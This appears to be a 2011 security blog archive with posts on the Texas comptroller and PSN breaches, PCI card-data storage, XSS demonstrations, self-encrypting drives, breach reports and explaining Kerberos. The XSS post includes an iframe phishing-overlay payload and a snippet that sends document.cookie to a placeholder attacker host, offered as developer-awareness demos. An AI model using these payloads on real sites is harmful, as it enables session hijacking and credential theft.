More Data Loss, Eh?

Comptroller Susan Combs offered another apology Thursday for the information breach in her agency, saying she now is offering a year of free credit monitoring to the 3.5 million people at risk of identity theft after their data was exposed on a public computer server…She announced in a written statement April 11 that the Social Security numbers and other personal information of 3.5 million people were left exposed for a year or more in a publicly accessible computer server at her agency.

Dallas News

According to this article in the Dallas Morning News, 3.5 million identities were left free for the taking on a public server for at least a year. That is a colossal security lapse. However, making credit monitoring available to the affected users is a fairly responsible remediation. (Contrast this with Sony’s recent PlayStation Network breach; Sony won’t even confirm whether credit card information was accessed in their attack.) Still, had literally any effort been put into keeping that information secure, the state of Texas wouldn’t have to spend an estimated $21 million on credit monitoring services.

The security arena is one in which the maxim “an ounce of prevention is worth a pound of cure” holds especially true. How much would it have cost to audit that server deployment? A few thousand dollars? Tens of thousands of dollars? Hundreds of thousands? Any answer less than “21 million dollars” means that this should never have happened.


Posted April 29 2011

PSN break-in

If you haven’t already heard about the PlayStation Network compromise, you should pay attention if you have a PS3 and use PSN. Your PSN online ID, name, address, and birthdate have all been compromised, and potentially your secret questions and credit card numbers as well. What I don’t understand is why Sony can’t definitively tell us whether the secret questions and answers or the credit card numbers have been stolen. PCI rules require strict controls over the CC information, and the PAN (CC number) must be stored *unreadable*:

Render PAN, at minimum, unreadable anywhere it is stored (including on portable digital media, backup media, in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography
• Truncation
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures
The MINIMUM account information that must be rendered unreadable is the PAN.
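
As a rough illustration only (none of this is from the PCI standard or from Sony, and the function and key names are hypothetical), here’s what a couple of those approaches might look like in practice: a keyed one-way hash for storage plus truncation for display.

    // Hypothetical sketch: render a PAN "unreadable" for storage by hashing it
    // with a secret key (a plain unsalted hash of a 16-digit PAN is easy to
    // brute-force), and keep only a truncated form for display.
    var crypto = require('crypto');

    function protectPan(pan, secretKey) {
      var hash = crypto.createHmac('sha256', secretKey).update(pan).digest('hex'); // stored value
      var truncated = pan.slice(0, 6) + '******' + pan.slice(-4);                  // display value
      return { stored: hash, display: truncated };
    }

The standard also allows index tokens or full encryption with proper key management; the point is simply that the raw PAN should never sit readable on disk.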

And any access to it must be tracked: “Track and monitor all access to network resources and cardholder data.”

So why can’t they tell if the data was accessed?

Either way, your data is “stolen” and can be used for identity theft. There are some indications that credit card information was stolen, but it’s not proven that it was stolen from Sony. Watch your credit card(s), your bank accounts, and everywhere else you need to. If you used the same password elsewhere, change it (you should have already done that after Gawker Media was compromised).


Posted April 28 2011

XSS: More Than Just Alert Boxes

Cross-site scripting (XSS) vulnerabilities allow an attacker to inject content in an otherwise trusted web page. XSS attacks in the wild typically try to execute JavaScript, and consequently XSS issues are typically demonstrated with a script function that’s short, simple, and visual: the alert box. Many XSS examples use alert(1) or alert(‘XSS’) as a payload.
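
To make the mechanics concrete, here is a minimal, purely hypothetical example of a reflected XSS flaw (not taken from any of the sites discussed here): a server that echoes a query parameter into its response without escaping, so a request like /search?q=<script>alert(1)</script> runs the injected script in the visitor’s browser.

    // Hypothetical vulnerable endpoint: the "q" parameter is reflected into the
    // HTML unescaped, so script tags in the query string execute in the
    // victim's browser.
    var http = require('http');
    var url = require('url');

    http.createServer(function (req, res) {
      var q = url.parse(req.url, true).query.q || '';
      res.writeHead(200, { 'Content-Type': 'text/html' });
      res.end('<p>Results for: ' + q + '</p>'); // unescaped reflection -> XSS
    }).listen(8080);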

As others have noted, though, this fails to show the power of XSS, and may lead to a “so what?” reaction from developers not familiar with such a vulnerability. I like to compare alert(1) to showing that the safety of a gun is off. If someone has never handled or heard of a gun before, a small switch out of place won’t mean much. But when they see the gun fire and witness the damage a bullet can cause, the significance of that safety becomes apparent.

While I’m hardly the first to compile a list of example payloads that go beyond simple alert boxes (see also XSS – Exploitation beyond alert(‘xss’) and alert(‘xss’) – The slow death of XSS), I think it bears repeating that security professionals should be prepared to demonstrate the real dangers of XSS. Here are a few ideas to keep in your toolbox:

  1. Expose cookies. My personal preference for a simple alert box when checking XSS is alert(document.cookie). Even developers who aren’t familiar with XSS will likely recognize that access to the session data stored in a user’s cookie presents a problem. And note that if the injected script can alert those values, it can also send them to an external server, allowing an attacker to take control of the victim’s account (see the sketch after this list).
  2. Gather real-world examples. While you’d certainly never want to just load a live payload on a vulnerable app, actual attacks against other sites are good testimonials to the real-world impact of XSS. A few to get your collection started:
    • Malware delivery on celebrity MySpace pages: Alicia Keys and other stars fell victim to an attack that didn’t even require JavaScript. An invisible <a> element covered the entire page, making any click send the user to a malicious site.
    • The Samy worm on MySpace: One of the fastest-spreading viruses used XSS. The Samy worm automatically friended other MySpace users and modified the profiles of victims. Its rapid spread caused MySpace to shut down temporarily.
    • Remote code execution on phones via the Android Market: A vulnerability in Google’s online store for Android apps could be used to send an install command when accessed from an Android phone. Once installed, the malicious app could then also be automatically launched.
    • Facebook bully video XSS payload: A recent attack exploiting a loophole in Facebook apps used event invites, chat messages, and Facebook pages to spread malicious links. The payload also included code for phishing account credentials.
  3. Phishing demo. Create a page that mimics your app’s login form but submits to a different location, and save it somewhere safe but accessible. Add this bit of code to quickly replace a vulnerable page with your phishing page:

    x=document.createElement('iframe');x.src='http://yourphishingpage/';x.height='100%';x.width='100%';x.frameBorder='0';document.body.innerHTML='';document.body.appendChild(x)

  4. Create a custom payload. Remember, once a script can be injected into a page, it basically has the same access as any other script in the page. If you’re already familiar with the code used by a vulnerable app, you can simply call a few of its functions from the XSS payload. With many sites using a range of client-side features, a few function calls can do quite a bit.
  5. Set up a BeEF demo. The Browser Exploitation Framework, or BeEF for short, is a tool that essentially lets you create a small botnet. BeEF can be used to log keystrokes, detect features or history, and even launch Metasploit to load more sophisticated attacks.
  6. Set up an XSS-based proxy. Tools such as Shell of the Future let you make requests for other sites from a victim’s browser and have the responses forwarded to your machine. This lets you tunnel traffic through other machines simply by exploiting XSS.
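
As promised in item 1, here’s a minimal sketch of cookie exposure going beyond an alert box: the same injected script that can alert document.cookie can just as easily ship it off-site. This is illustrative only; "attacker.example" is a placeholder, not a real collection endpoint.

    // Illustrative only: exfiltrate the victim's cookie by loading an "image"
    // from an attacker-controlled host, with the cookie in the query string.
    new Image().src = 'https://attacker.example/c?d=' + encodeURIComponent(document.cookie);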


Posted April 26 2011

Security-minded Storage Devices

While the software industry continues to make strides in the area of security and data protection, the hardware industry shouldn’t be underestimated. With the announcement of storage devices like Toshiba’s MK-61GSYG hard disk drives, it may only be a matter of time before we see even more creative security features for hardware (due, in part, to industry-wide adoption of standards). Toshiba’s hard drive comes with some interesting security tricks, including the ability to configure the disk to erase itself when connected to an unauthorized host, and the ability for the drive to self-encrypt without relying on the host computer’s operating system for cryptographic operations.

Most of the features are drawn from the standards found in the Opal Security Subsystem Class (SSC) (pdf). The SSC is, in turn, based on the TCG Storage Architecture Core Specification. TCG is the same group behind the TPM platform standard, which was designed to let a system create and operate a trusted subenvironment from within an untrusted environment. The TPM platform still receives a fair amount of criticism for privacy issues and the potential for abuse.

A similar approach is used for some Opal-compliant storage devices: dedicated on-board hardware that can handle a range of specialized operations (maintenance, authentication, cryptography) independently. The result is hardware like the MK-61GSYG, which probably meets many storage security requirements right out of the box. Although much can be said about the controversy that surrounds newer standards, they can certainly provide a welcome stepping stone for innovation.


Posted April 21 2011

Data Breach Report Overload

It’s data breach report day today. Or so it seems. My brain just ‘sploded on overload from all the fresh, tasty stats received. There’s not enough time today to go through everything with a fine-toothed comb. Suffice it to say:

• Data breaches are continuing to happen in growing numbers.
• Basic security practices still aren’t happening.
• As painful as it is to admit, it appears that regulations like PCI DSS are having a positive impact.
• Our codebase still leaves much to be desired, though there is reason to be a bit optimistic.

That said, here’s the goods:

1. Verizon Business 2011 Data Breach Investigation Report
2. Veracode 2011 “State of Software Security” Report
3. Ponemon 2011 PCI DSS Compliance Trends Study

Incidentally, if you take the combined results of these studies, one of the key takeaways ties in very nicely with this quote from the current Cloud Security Alliance (CSA) v2.1 Security Guidance: “A portion of the cost savings obtained by Cloud Computing services must be invested into increased scrutiny of the security capabilities of the provider, application of security controls, and ongoing detailed assessments and audits, to ensure requirements are continuously met.” (h/t Gunnar Peterson)


Posted April 19 2011

Explaining security protocols

Many papers and online explanations of security protocols are dense and quite complicated. And sometimes even security professionals don’t understand the explanations.

When I first started at CMU, there was a class called “Internet Security”. I went to the first lecture and promptly dropped the class. I understood practical security – but this class focused on theoretical security. In that first lecture, we were given the “security language” of Kerberos. At the time, I had barely used Kerberos as part of the CMU computer systems, and certainly didn’t understand it – and didn’t realize that that’s what the class was about until several years later. Now I finally understand more, and really wish I hadn’t dropped that class.

However, there are likely few people in the world (most of them in academia) who can understand the language presented in that class. It’s important for communication between researchers, but it leaves those of us with a more practical mindset scratching our heads.
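
To give a flavor of what that kind of notation looks like, here is a rough, simplified sketch from memory (not the exact formalism the class used) of the core Kerberos exchange, where C is the client, S the service, T a ticket, A an authenticator, K(x,y) a key shared by x and y, and {m}K means m encrypted under key K:

    C   -> AS  : C, TGS                                (request a ticket-granting ticket)
    AS  -> C   : {K(C,TGS), {T(C,TGS)}K(TGS)}K(C)      (session key + TGT, sealed with C's key)
    C   -> TGS : {A(C)}K(C,TGS), {T(C,TGS)}K(TGS), S   (present TGT, request a ticket for S)
    TGS -> C   : {K(C,S), {T(C,S)}K(S)}K(C,TGS)        (session key + ticket for S)
    C   -> S   : {A(C)}K(C,S), {T(C,S)}K(S)            (present ticket and authenticator to S)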

Back in 1988, Bill Bryant wrote a “play” to explain Kerberos. And once I found that play, I finally understood how Kerberos worked. It may not have been as short and succinct as the security language my class taught, but I understood it – and still understand it years later.

Security folks sometimes have communication issues – it doesn’t hurt to try another method of communicating.


Posted April 15 2011